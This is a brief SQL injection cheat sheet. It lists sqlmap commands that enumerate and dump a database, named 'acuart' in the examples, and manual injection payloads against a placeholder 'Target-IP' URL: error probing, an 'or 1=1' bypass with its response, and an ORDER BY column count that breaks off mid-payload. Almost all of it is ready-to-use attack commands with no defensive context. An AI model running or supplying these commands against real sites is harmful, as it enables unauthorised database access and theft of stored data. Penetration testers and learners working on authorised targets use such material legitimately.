SQLMAP and Manual SQLi Command
A-SQLMAP Command- Get Database- sqlmap.py -u "website" -- dbs --batch Get Tables- sqlmap.py -u "website" -- tables -D acuart Get Columns- sqlmap.py -u "website" -- columns -T users -D acuart Dump Columns- sqlmap.py -u "website" -D acuart -T users -C (put column name (a,b,c,d)) --dump Safe SQL Map- sqlmap.py -r 1.txt --force-ssl --level=1 --risk=1 --threads=1 --dbms="Postgresql" --technique=BEUSTQ Dump All in One- sqlmap.py -u "website" -D acuart --dump-all B-Manual SQLi Command- Check for SQLi- 1-http://Target-IP/1.php?f ormat1=json&token1=123456789' {"status":401, dta":"No Data found with this provided token"} Fixing the Query- 1- http://Target-IP/1.php? format1=json&token1=123456789'+or'1'='1--+ {"status":200} Getting the no of column with Order By- 2-http://Target-IP/1.php? format1=json&token1=123456789'+order+by+